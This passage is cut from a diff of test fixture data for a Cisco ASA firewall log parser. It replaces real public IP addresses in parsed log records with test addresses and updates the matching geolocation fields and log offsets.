         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638)",
+        "event.original": "%ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (175.16.199.1/22638)",
         "event.severity": 2,
         "event.timezone": "-02:00",
         "event.type": [
@@ -1319,7 +1309,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "critical",
-        "log.offset": 3491,
+        "log.offset": 3551,
         "network.community_id": "1:QsMj86uzy+H1c1pPwrevpSOTh6Q=",
         "network.direction": "outbound",
         "network.iana_number": 17,
@@ -1335,9 +1325,9 @@
         ],
         "related.ip": [
             "10.10.10.10",
+            "175.16.199.1",
             "192.168.2.2",
-            "8.8.8.4",
-            "8.8.8.8"
+            "8.8.8.4"
         ],
         "service.type": "cisco",
         "source.address": "10.10.10.10",
@@ -1377,7 +1367,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 3654,
+        "log.offset": 3719,
         "network.community_id": "1:mPK7q/c5ZVhrh2fX6Uqp5314u3M=",
         "network.iana_number": 6,
         "network.transport": "tcp",
@@ -1428,7 +1418,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 3818,
+        "log.offset": 3883,
         "network.iana_number": 6,
         "network.transport": "tcp",
         "observer.hostname": "dev01",
@@ -1477,7 +1467,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "critical",
-        "log.offset": 3935,
+        "log.offset": 4000,
         "network.community_id": "1:CQXm0MA6TgkTzvcatvgQvikqqes=",
         "network.direction": "inbound",
         "network.iana_number": 17,
@@ -1529,7 +1519,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 4053,
+        "log.offset": 4118,
         "network.community_id": "1:CctaOB5wLrJrIATPwYjXODlSpRk=",
         "network.iana_number": 6,
         "network.transport": "tcp",
@@ -1580,7 +1570,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 4197,
+        "log.offset": 4262,
         "network.community_id": "1:ghA7Jv5D0sCP4HhHb948hjqh3H4=",
         "network.iana_number": 6,
         "network.transport": "tcp",
@@ -1631,7 +1621,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 4337,
+        "log.offset": 4402,
         "network.community_id": "1:daEI7UiyuAFNVP1xsUsb/AHJ/1I=",
         "network.iana_number": 6,
         "network.transport": "tcp",
@@ -1671,7 +1661,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)",
+        "event.original": "%ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (175.16.199.1/10051)",
         "event.severity": 6,
         "event.timezone": "-02:00",
         "event.type": [
@@ -1681,7 +1671,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 4472,
+        "log.offset": 4537,
         "network.community_id": "1:1Rjth0DOphFZyLUBP572S4VdEu0=",
         "network.iana_number": 6,
         "network.transport": "tcp",
@@ -1722,7 +1712,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-302022: Built forwarder  stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)",
+        "event.original": "%ASA-6-302022: Built forwarder  stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (175.16.199.1/10051)",
         "event.severity": 6,
         "event.timezone": "-02:00",
         "event.type": [
@@ -1732,7 +1722,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 4631,
+        "log.offset": 4701,
         "network.community_id": "1:1Rjth0DOphFZyLUBP572S4VdEu0=",
         "network.iana_number": 6,
         "network.transport": "tcp",
@@ -1773,7 +1763,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-302022: Built backup  stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (8.8.8.8/10051)",
+        "event.original": "%ASA-6-302022: Built backup  stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (175.16.199.1/10051)",
         "event.severity": 6,
         "event.timezone": "-02:00",
         "event.type": [
@@ -1783,7 +1773,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 4791,
+        "log.offset": 4866,
         "network.iana_number": 6,
         "network.transport": "tcp",
         "observer.egress.interface.name": "net",
@@ -1837,7 +1827,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 4949,
+        "log.offset": 5029,
         "network.bytes": 0,
         "network.community_id": "1:A692g/lxHLbLsT0d0M1RFfiHIs0=",
         "network.iana_number": 6,
@@ -1893,7 +1883,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 5142,
+        "log.offset": 5222,
         "network.bytes": 0,
         "network.community_id": "1:pcILvYGm5J7rxuqU5/TRGZGGe3E=",
         "network.iana_number": 6,
@@ -1941,7 +1931,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "debug",
-        "log.offset": 5369,
+        "log.offset": 5449,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -1980,7 +1970,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "debug",
-        "log.offset": 5476,
+        "log.offset": 5556,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -2026,7 +2016,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 5571,
+        "log.offset": 5651,
         "network.community_id": "1:XgYjYk8hbPPlEnBcHqCD172wQQE=",
         "network.iana_number": 6,
         "network.transport": "tcp",
@@ -2080,7 +2070,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 5743,
+        "log.offset": 5823,
         "network.community_id": "1:a99mceIcFv0NTz6Aw/+bwE1TnPA=",
         "network.iana_number": 6,
         "network.transport": "tcp",
@@ -2126,7 +2116,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 5922,
+        "log.offset": 6002,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -2150,7 +2140,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (8.8.8.8)",
+        "event.original": "%ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (175.16.199.1)",
         "event.severity": 6,
         "event.timezone": "-02:00",
         "event.type": [
@@ -2160,7 +2150,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 6113,
+        "log.offset": 6193,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -2200,7 +2190,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "debug",
-        "log.offset": 6256,
+        "log.offset": 6341,
         "network.community_id": "1:pXZbIlTv2J4XdRhqORC4IQqpKKg=",
         "network.iana_number": 17,
         "network.transport": "udp",
@@ -2245,7 +2235,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 6362,
+        "log.offset": 6447,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -2269,7 +2259,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (8.8.8.8/123)",
+        "event.original": "%ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (175.16.199.1/123)",
         "event.severity": 6,
         "event.timezone": "-02:00",
         "event.type": [
@@ -2279,7 +2269,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 6571,
+        "log.offset": 6656,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -2319,7 +2309,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "error",
-        "log.offset": 6722,
+        "log.offset": 6812,
         "network.community_id": "1:4MHSMLtBw+4q7Wke3ztBRVwtgt0=",
         "network.direction": "inbound",
         "network.iana_number": 1,
@@ -2371,7 +2361,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 6838,
+        "log.offset": 6928,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -2412,7 +2402,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "error",
-        "log.offset": 7071,
+        "log.offset": 7161,
         "network.community_id": "1:frDwW4LN1XFwCsYClx5AmXSlEBE=",
         "network.direction": "inbound",
         "network.transport": "sctp",
@@ -2462,7 +2452,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 7178,
+        "log.offset": 7268,
         "network.community_id": "1:gZP3lWRSgL55d5cZvFu18yXen5M=",
         "network.iana_number": 6,
         "network.transport": "tcp",
@@ -2512,7 +2502,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "notification",
-        "log.offset": 7351,
+        "log.offset": 7441,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -2559,7 +2549,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "notification",
-        "log.offset": 7446,
+        "log.offset": 7536,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -2606,7 +2596,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "notification",
-        "log.offset": 7563,
+        "log.offset": 7653,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -2653,7 +2643,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "notification",
-        "log.offset": 7699,
+        "log.offset": 7789,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -2681,18 +2671,14 @@
         "cisco.asa.destination_interface": "server.deflan",
         "cisco.asa.message_id": "302304",
         "cisco.asa.source_interface": "server.deflan",
-        "destination.address": "2.3.4.5",
-        "destination.as.number": 3215,
-        "destination.as.organization.name": "Orange",
-        "destination.geo.city_name": "Clermont-Ferrand",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "FR",
-        "destination.geo.country_name": "France",
-        "destination.geo.location.lat": 45.7838,
-        "destination.geo.location.lon": 3.0966,
-        "destination.geo.region_iso_code": "FR-63",
-        "destination.geo.region_name": "Puy-de-D\u00f4me",
-        "destination.ip": "2.3.4.5",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.port": 9101,
         "event.action": "flow-expiration",
         "event.category": [
@@ -2704,7 +2690,7 @@
         "event.end": "2021-04-27T04:12:23.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:1.2.3.4/54242 to server.deflan:2.3.4.5/9101 duration 1:00:02 bytes 245 Connection timeout",
+        "event.original": "%ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:81.2.69.143/54242 to server.deflan:67.43.156.12/9101 duration 1:00:02 bytes 245 Connection timeout",
         "event.reason": "Connection timeout",
         "event.severity": 6,
         "event.start": "2021-04-27T05:12:21.000Z",
@@ -2717,9 +2703,9 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 7808,
+        "log.offset": 7898,
         "network.bytes": 245,
-        "network.community_id": "1:GUlUhGicslkTpg27XLqbp4L0H68=",
+        "network.community_id": "1:DTKtr5ZYYVZ5CGRDZjqE7Sk+MJQ=",
         "network.iana_number": 6,
         "network.transport": "tcp",
         "observer.egress.interface.name": "server.deflan",
@@ -2732,20 +2718,20 @@
             "dev01"
         ],
         "related.ip": [
-            "1.2.3.4",
-            "2.3.4.5"
+            "67.43.156.12",
+            "81.2.69.143"
         ],
         "service.type": "cisco",
-        "source.address": "1.2.3.4",
-        "source.geo.city_name": "Moscow",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "RU",
-        "source.geo.country_name": "Russia",
-        "source.geo.location.lat": 55.7527,
-        "source.geo.location.lon": 37.6172,
-        "source.geo.region_iso_code": "RU-MOW",
-        "source.geo.region_name": "Moscow",
-        "source.ip": "1.2.3.4",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "source.port": 54242,
         "tags": [
             "cisco-asa",
@@ -2780,7 +2766,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 8003,
+        "log.offset": 8102,
         "network.community_id": "1:B0rqhFg9+Gx1GmU4JRhiyO3+xmE=",
         "network.iana_number": 6,
         "network.transport": "tcp",
@@ -2812,16 +2798,6 @@
         "cisco.asa.rule_name": "testrulename",
         "cisco.asa.source_interface": "insideintf",
         "destination.address": "195.122.12.242",
-        "destination.as.number": 12578,
-        "destination.as.organization.name": "SIA Tet",
-        "destination.geo.city_name": "Riga",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "LV",
-        "destination.geo.country_name": "Latvia",
-        "destination.geo.location.lat": 56.9496,
-        "destination.geo.location.lon": 24.0978,
-        "destination.geo.region_iso_code": "LV-RIX",
-        "destination.geo.region_name": "Riga",
         "destination.ip": "195.122.12.242",
         "destination.port": 53,
         "event.action": "firewall-rule",
@@ -2844,7 +2820,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "notification",
-        "log.offset": 8160,
+        "log.offset": 8259,
         "network.iana_number": 6,
         "network.transport": "tcp",
         "observer.egress.interface.name": "OUTSIDE",
@@ -2891,7 +2867,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "notification",
-        "log.offset": 8353,
+        "log.offset": 8452,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -2929,7 +2905,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "notification",
-        "log.offset": 8421,
+        "log.offset": 8520,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -2974,7 +2950,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "notification",
-        "log.offset": 8528,
+        "log.offset": 8627,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -3017,7 +2993,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 8623,
+        "log.offset": 8722,
         "network.protocol": "https",
         "observer.egress.interface.name": "FCD-FS-LAN",
         "observer.hostname": "dev01",
@@ -3065,7 +3041,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 8746,
+        "log.offset": 8845,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -3113,7 +3089,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 8849,
+        "log.offset": 8948,
         "network.protocol": "ssh",
         "observer.egress.interface.name": "FCD-FS-LAN",
         "observer.hostname": "dev01",
@@ -3161,7 +3137,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 8971,
+        "log.offset": 9070,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -3194,7 +3170,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-5-713049: Group = 91.240.17.178, IP = 91.240.17.178, Security negotiation complete for LAN-to-LAN Group (91.240.17.178) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d",
+        "event.original": "%ASA-5-713049: Group = 81.2.69.143, IP = 81.2.69.143, Security negotiation complete for LAN-to-LAN Group (81.2.69.143) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d",
         "event.severity": 5,
         "event.timezone": "-02:00",
         "event.type": [
@@ -3204,7 +3180,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "notification",
-        "log.offset": 9077,
+        "log.offset": 9176,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -3213,21 +3189,19 @@
             "dev01"
         ],
         "related.ip": [
-            "91.240.17.178"
+            "81.2.69.143"
         ],
         "service.type": "cisco",
-        "source.address": "91.240.17.178",
-        "source.as.number": 201126,
-        "source.as.organization.name": "CDW Ltd",
+        "source.address": "81.2.69.143",
         "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
         "source.geo.country_iso_code": "GB",
         "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.5888,
-        "source.geo.location.lon": -0.0247,
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.region_iso_code": "GB-ENG",
         "source.geo.region_name": "England",
-        "source.ip": "91.240.17.178",
+        "source.ip": "81.2.69.143",
         "tags": [
             "cisco-asa",
             "forwarded"
@@ -3236,19 +3210,17 @@
     {
         "cisco.asa.message_id": "113019",
         "cisco.asa.session_type": "LAN-to-LAN",
-        "destination.address": "91.240.17.178",
-        "destination.as.number": 201126,
-        "destination.as.organization.name": "CDW Ltd",
+        "destination.address": "81.2.69.143",
         "destination.bytes": 1216163,
         "destination.geo.city_name": "London",
         "destination.geo.continent_name": "Europe",
         "destination.geo.country_iso_code": "GB",
         "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 51.5888,
-        "destination.geo.location.lon": -0.0247,
+        "destination.geo.location.lat": 51.5142,
+        "destination.geo.location.lon": -0.0931,
         "destination.geo.region_iso_code": "GB-ENG",
         "destination.geo.region_name": "England",
-        "destination.ip": "91.240.17.178",
+        "destination.ip": "81.2.69.143",
         "event.action": "firewall-rule",
         "event.category": [
             "network"
@@ -3259,7 +3231,7 @@
         "event.end": "2021-04-27T02:03:03.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-4-113019: Group = 91.240.17.178, Username = 91.240.17.178, IP = 91.240.17.178, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested",
+        "event.original": "%ASA-4-113019: Group = 81.2.69.143, Username = 81.2.69.143, IP = 81.2.69.143, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested",
         "event.reason": "User Requested",
         "event.severity": 4,
         "event.start": "2021-04-27T03:30:47.000Z",
@@ -3271,7 +3243,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 9288,
+        "log.offset": 9381,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -3280,15 +3252,15 @@
             "dev01"
         ],
         "related.ip": [
-            "91.240.17.178"
+            "81.2.69.143"
         ],
         "related.user": [
-            "91.240.17.178"
+            "81.2.69.143"
         ],
         "service.type": "cisco",
         "source.bytes": 297103,
-        "source.user.group.name": "91.240.17.178",
-        "source.user.name": "91.240.17.178",
+        "source.user.group.name": "81.2.69.143",
+        "source.user.name": "81.2.69.143",
         "tags": [
             "cisco-asa",
             "forwarded"
@@ -3316,7 +3288,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 9527,
+        "log.offset": 9614,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -3350,7 +3322,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-716002: Group another-policy User testuser IP 8.8.8.8 WebVPN session terminated: User Requested.",
+        "event.original": "%ASA-6-716002: Group another-policy User testuser IP 175.16.199.1 WebVPN session terminated: User Requested.",
         "event.reason": "User Requested",
         "event.severity": 6,
         "event.timezone": "-02:00",
@@ -3361,7 +3333,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 9680,
+        "log.offset": 9767,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -3370,21 +3342,22 @@
             "dev01"
         ],
         "related.ip": [
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "testuser"
         ],
         "service.type": "cisco",
-        "source.address": "8.8.8.8",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "8.8.8.8",
+        "source.address": "175.16.199.1",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "source.user.name": "testuser",
         "tags": [
             "cisco-asa",
@@ -3413,7 +3386,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 9807,
+        "log.offset": 9899,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -3440,16 +3413,6 @@
         "cisco.asa.destination_interface": "outside",
         "cisco.asa.message_id": "710003",
         "destination.address": "195.74.114.34",
-        "destination.as.number": 8468,
-        "destination.as.organization.name": "Entanet",
-        "destination.geo.city_name": "Stoke Newington",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "GB",
-        "destination.geo.country_name": "United Kingdom",
-        "destination.geo.location.lat": 51.5638,
-        "destination.geo.location.lon": -0.0765,
-        "destination.geo.region_iso_code": "GB-HCK",
-        "destination.geo.region_name": "Hackney",
         "destination.ip": "195.74.114.34",
         "destination.port": 23,
         "event.action": "firewall-rule",
@@ -3460,7 +3423,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-3-710003: TCP access denied by ACL from 104.46.88.19/6370 to outside:195.74.114.34/23",
+        "event.original": "%ASA-3-710003: TCP access denied by ACL from 67.43.156.13/6370 to outside:195.74.114.34/23",
         "event.outcome": "failure",
         "event.severity": 3,
         "event.timezone": "-02:00",
@@ -3472,8 +3435,8 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "error",
-        "log.offset": 9934,
-        "network.community_id": "1:9NRUY+1nxDxjlLBwQoakpBYA9sc=",
+        "log.offset": 10026,
+        "network.community_id": "1:HGV6Jx3H/I6pH7ssIeSFtuaT99I=",
         "network.iana_number": 6,
         "network.transport": "tcp",
         "observer.egress.interface.name": "outside",
@@ -3485,22 +3448,18 @@
             "dev01"
         ],
         "related.ip": [
-            "104.46.88.19",
-            "195.74.114.34"
+            "195.74.114.34",
+            "67.43.156.13"
         ],
         "service.type": "cisco",
-        "source.address": "104.46.88.19",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
-        "source.geo.city_name": "Dublin",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "IE",
-        "source.geo.country_name": "Ireland",
-        "source.geo.location.lat": 53.3338,
-        "source.geo.location.lon": -6.2488,
-        "source.geo.region_iso_code": "IE-L",
-        "source.geo.region_name": "Leinster",
-        "source.ip": "104.46.88.19",
+        "source.address": "67.43.156.13",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.port": 6370,
         "tags": [
             "cisco-asa",
@@ -3522,7 +3481,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:91.240.17.178/8888 to destinationInterfaceName:192.168.2.2/123123 locally",
+        "event.original": "%ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:81.2.69.143/8888 to destinationInterfaceName:192.168.2.2/123123 locally",
         "event.outcome": "unknown",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -3534,7 +3493,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "notification",
-        "log.offset": 10048,
+        "log.offset": 10140,
         "network.protocol": "tcp",
         "observer.egress.interface.name": "destinationInterfaceName",
         "observer.hostname": "dev01",
@@ -3547,21 +3506,19 @@
         ],
         "related.ip": [
             "192.168.2.2",
-            "91.240.17.178"
+            "81.2.69.143"
         ],
         "service.type": "cisco",
-        "source.address": "91.240.17.178",
-        "source.as.number": 201126,
-        "source.as.organization.name": "CDW Ltd",
+        "source.address": "81.2.69.143",
         "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
         "source.geo.country_iso_code": "GB",
         "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.5888,
-        "source.geo.location.lon": -0.0247,
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.region_iso_code": "GB-ENG",
         "source.geo.region_name": "England",
-        "source.ip": "91.240.17.178",
+        "source.ip": "81.2.69.143",
         "source.port": 8888,
         "tags": [
             "cisco-asa",
@@ -3579,7 +3536,7 @@
         "event.code": 434002,
         "event.dataset": "cisco.asa",
         "event.module": "cisco",
-        "event.original": "%ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:91.240.17.138/8888 to destinationInterfaceName:192.168.2.2/514514",
+        "event.original": "%ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:67.43.156.15/8888 to destinationInterfaceName:192.168.2.2/514514",
         "event.outcome": "unknown",
         "event.severity": 4,
         "event.timezone": "-02:00",
@@ -3587,7 +3544,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 10266,
+        "log.offset": 10356,
         "network.protocol": "tcp",
         "observer.egress.interface.name": "destinationInterfaceName",
         "observer.hostname": "dev01",
@@ -3600,21 +3557,17 @@
         ],
         "related.ip": [
             "192.168.2.2",
-            "91.240.17.138"
+            "67.43.156.15"
         ],
         "service.type": "cisco",
-        "source.address": "91.240.17.138",
-        "source.as.number": 201126,
-        "source.as.organization.name": "CDW Ltd",
-        "source.geo.city_name": "London",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "GB",
-        "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.5888,
-        "source.geo.location.lon": -0.0247,
-        "source.geo.region_iso_code": "GB-ENG",
-        "source.geo.region_name": "England",
-        "source.ip": "91.240.17.138",
+        "source.address": "67.43.156.15",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.15",
         "source.port": 8888,
         "tags": [
             "cisco-asa",
@@ -3635,7 +3588,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:91.240.17.178/7777 to 192.168.2.2/123412",
+        "event.original": "%ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:81.2.69.143/7777 to 192.168.2.2/123412",
         "event.outcome": "failure",
         "event.reason": "Failed to locate egress interface",
         "event.severity": 6,
@@ -3648,7 +3601,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 10433,
+        "log.offset": 10522,
         "network.protocol": "tcp",
         "observer.hostname": "dev01",
         "observer.ingress.interface.name": "sourceInterfaceName",
@@ -3660,21 +3613,19 @@
         ],
         "related.ip": [
             "192.168.2.2",
-            "91.240.17.178"
+            "81.2.69.143"
         ],
         "service.type": "cisco",
-        "source.address": "91.240.17.178",
-        "source.as.number": 201126,
